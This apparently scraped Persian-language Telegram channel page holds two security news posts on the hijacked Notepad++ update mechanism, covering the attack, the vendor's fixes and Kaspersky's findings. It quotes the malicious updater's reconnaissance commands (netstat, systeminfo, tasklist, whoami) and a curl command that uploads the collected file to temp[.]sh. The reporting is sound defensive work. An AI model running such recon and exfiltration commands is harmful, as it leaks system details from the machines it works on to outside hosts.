🔴 ضعف امنیتی در بروزرسانی ++Notepad
نرم افزار ++Notepad برای بروزرسانی خودش از GUP.exe (WinGUp) استفاده میکنه. فرایند بروزرسانی هم اینطوریه که درخواستی به این آدرس ارسال میکنه:
اگه مورد جدیدی باشه، یک فایل XML با محتویات زیر برمیگردونه:
اخیرا یکی از کاربران گزارش داده که WinGUp یک فایل در مسیر زیر ایجاد میکنه:
و یسری دستورات مرتبط با ریکان رو اجرا و در فایل a.txt ذخیره میکنه:
بعدش، autoupdater.exe این فایل رو از طریق curl.exe به temp[.]sh ارسال میکنه.
کاربرا 2 تا حدس میزنن: یا اینکه کاربر از یک نسخه ی آلوده استفاده میکنه (Malvertising) یا اینکه ترافیک بروزرسانی دستکاری شده.
محقق امنیتی Kevin Beaumont اعلام کرده که اوایل این ماه سه سازمان در شرق آسیا، از این طرق هک شدن و احتمال میده که هکرها از طریق دستکاری ترافیک و تغییر مقدار Location در XML، تونستن این کار انجام بدن.
با توجه به اینکه ترافیک این سایت بدلیل تعداد کاربراش قابل شناسایی هستش و همچنین مهاجم با قرار گرفتن در مسیر ISP میتونه ترافیک رو دستکاری کنه، 18 نوامبر، نسخه ی 8.8.8 منتشر شده که فقط بروزرسانی رو از گیتهاب میگرفت. (گیتهاب ترافیکش برای شناسایی سختتره - کاربراش زیادن)
9 دسامبر هم نسخه ی 8.8.9 منتشر شده که مانع نصب هر گونه بروزرسانی میشه که با گواهی امضای کد سازنده امضا نشده باشه.
توسعه دهنده ی ++Notepad هم اعلام کرده که تحقیقات برای مشخصکردن روش دقیق سرقت و دستکاری ترافیک ادامه داره. بعد از رسیدن به شواهد قطعی، کاربران مطلع خواهند شد.
توصیه شده، نسخه 8.8.9 رو از سایت اصلی بصورت دستی دانلود و نصب کنید./منبع
#آسیب_پذیری_امنیتی
#NotepadPlusPlus
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
نرم افزار ++Notepad برای بروزرسانی خودش از GUP.exe (WinGUp) استفاده میکنه. فرایند بروزرسانی هم اینطوریه که درخواستی به این آدرس ارسال میکنه:
https://notepad-plus-plus.org/update/getDownloadUrl.php?version=<versionnumber>
اگه مورد جدیدی باشه، یک فایل XML با محتویات زیر برمیگردونه:
<GUP>
<script/>
<NeedToBeUpdated>yes</NeedToBeUpdated>
<Version>8.8.8</Version>
<Location>https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.8.8/npp.8.8.8.Installer.exe</Location>
</GUP>
اخیرا یکی از کاربران گزارش داده که WinGUp یک فایل در مسیر زیر ایجاد میکنه:
%Temp%\AutoUpdater.exe
و یسری دستورات مرتبط با ریکان رو اجرا و در فایل a.txt ذخیره میکنه:
cmd /c netstat -ano >> a.txt
cmd /c systeminfo >> a.txt
cmd /c tasklist >> a.txt
cmd /c whoami >> a.txt
بعدش، autoupdater.exe این فایل رو از طریق curl.exe به temp[.]sh ارسال میکنه.
کاربرا 2 تا حدس میزنن: یا اینکه کاربر از یک نسخه ی آلوده استفاده میکنه (Malvertising) یا اینکه ترافیک بروزرسانی دستکاری شده.
محقق امنیتی Kevin Beaumont اعلام کرده که اوایل این ماه سه سازمان در شرق آسیا، از این طرق هک شدن و احتمال میده که هکرها از طریق دستکاری ترافیک و تغییر مقدار Location در XML، تونستن این کار انجام بدن.
با توجه به اینکه ترافیک این سایت بدلیل تعداد کاربراش قابل شناسایی هستش و همچنین مهاجم با قرار گرفتن در مسیر ISP میتونه ترافیک رو دستکاری کنه، 18 نوامبر، نسخه ی 8.8.8 منتشر شده که فقط بروزرسانی رو از گیتهاب میگرفت. (گیتهاب ترافیکش برای شناسایی سختتره - کاربراش زیادن)
9 دسامبر هم نسخه ی 8.8.9 منتشر شده که مانع نصب هر گونه بروزرسانی میشه که با گواهی امضای کد سازنده امضا نشده باشه.
توسعه دهنده ی ++Notepad هم اعلام کرده که تحقیقات برای مشخصکردن روش دقیق سرقت و دستکاری ترافیک ادامه داره. بعد از رسیدن به شواهد قطعی، کاربران مطلع خواهند شد.
توصیه شده، نسخه 8.8.9 رو از سایت اصلی بصورت دستی دانلود و نصب کنید./منبع
#آسیب_پذیری_امنیتی
#NotepadPlusPlus
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
Community
autoupdater and connection temp.sh
Submission for any help regarding a finding that came through from AutoUpdater!? Malicious command seen: curl.exe -F "file=@a.txt" -s https://temp[.]sh/uploa...
❤8
OnHex
🔴 ضعف امنیتی در بروزرسانی ++Notepad نرم افزار ++Notepad برای بروزرسانی خودش از GUP.exe (WinGUp) استفاده میکنه. فرایند بروزرسانی هم اینطوریه که درخواستی به این آدرس ارسال میکنه: https://notepad-plus-plus.org/update/getDownloadUrl.php?version=<versionnumber>…
🔴 همانطور که قبلا اطلاع رسانی کرده بودم، مکانیزم بروزرسانی ++Notepad مورد سوء استفاده قرار گرفته بود و مهاجمین از این طریق اقدام به انتشار بدافزار کرده بودن. توسعه دهنده یکسری اقدامات امنیتی انجام داد و اعلام کرد که تحقیقاتی در این خصوص در حال انجام هستش و قرار شد، نتیجه رو اطلاع رسانی کنن.
حالا یک گزارشی منتشر کردن که مشخص شده نفوذ در سطح ارائه دهنده هاستینگ و احتمالا توسط یک گروه هکری چینی انجام شده. براساس بررسی لاگها احتمال میدن که هکرها از ژوئن تا ۲ دسامبر ۲۰۲۵ (6 ماه) به زیرساخت ++Notepad دسترسی داشتن و اقدام به توزیع بدافزار کردن.
اقدامات امنیتی که انجام دادن، به یک هاستینگ بهتر مهاجرت کردن. در خود برنامه هم، گواهی و امضای بروزرسانی رو بررسی میکنن. همچنین XML برگشتی از سرور بروزرسانی، حالا امضا شده (XMLDSig) و تأیید گواهی و امضا از نسخه آینده، v8.9.2 که حدود یک ماه دیگه منتشر میشه، اعمال خواهد شد.
در نهایت عذرخواهی کردن و توصیه کردن، نصب کننده v8.9.1 رو از سایت دانلود و دستی نصب کنید.
محققای کسپرسکی هم گزارشی منتشر و یکسری IOC ارائه کردن. در گزارش اشاره شده که در این حمله از یک آسیب پذیری که برای سال 2010 در ProShow هستش، استفاده کردن. همچنین در مجموع سه زنجیره آلودگی برای هدف قرار دادن موارد زیر رو مشاهده کردن:
- افراد واقع در ویتنام، السالوادور و استرالیا
- یک سازمان دولتی واقع در فیلیپین
- یک سازمان مالی واقع در السالوادور
- یک سازمان ارائهدهنده خدمات فناوری اطلاعات واقع در ویتنام
#بازیگران_تهدید
#NotepadPlusPlus
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
حالا یک گزارشی منتشر کردن که مشخص شده نفوذ در سطح ارائه دهنده هاستینگ و احتمالا توسط یک گروه هکری چینی انجام شده. براساس بررسی لاگها احتمال میدن که هکرها از ژوئن تا ۲ دسامبر ۲۰۲۵ (6 ماه) به زیرساخت ++Notepad دسترسی داشتن و اقدام به توزیع بدافزار کردن.
اقدامات امنیتی که انجام دادن، به یک هاستینگ بهتر مهاجرت کردن. در خود برنامه هم، گواهی و امضای بروزرسانی رو بررسی میکنن. همچنین XML برگشتی از سرور بروزرسانی، حالا امضا شده (XMLDSig) و تأیید گواهی و امضا از نسخه آینده، v8.9.2 که حدود یک ماه دیگه منتشر میشه، اعمال خواهد شد.
در نهایت عذرخواهی کردن و توصیه کردن، نصب کننده v8.9.1 رو از سایت دانلود و دستی نصب کنید.
محققای کسپرسکی هم گزارشی منتشر و یکسری IOC ارائه کردن. در گزارش اشاره شده که در این حمله از یک آسیب پذیری که برای سال 2010 در ProShow هستش، استفاده کردن. همچنین در مجموع سه زنجیره آلودگی برای هدف قرار دادن موارد زیر رو مشاهده کردن:
- افراد واقع در ویتنام، السالوادور و استرالیا
- یک سازمان دولتی واقع در فیلیپین
- یک سازمان مالی واقع در السالوادور
- یک سازمان ارائهدهنده خدمات فناوری اطلاعات واقع در ویتنام
#بازیگران_تهدید
#NotepadPlusPlus
🆔 @onhex_ir
🌍 ONHEXGROUP (Official Links)
Securelist
The Notepad++ supply chain attack – unnoticed execution chains and new IoCs
Kaspersky GReAT experts discovered previously undocumented infection chains used in the Notepad++ supply chain attacks. The article provides new IoCs related to those incidents which employ DLL sideloading and Cobalt Strike Beacon delivery.
❤6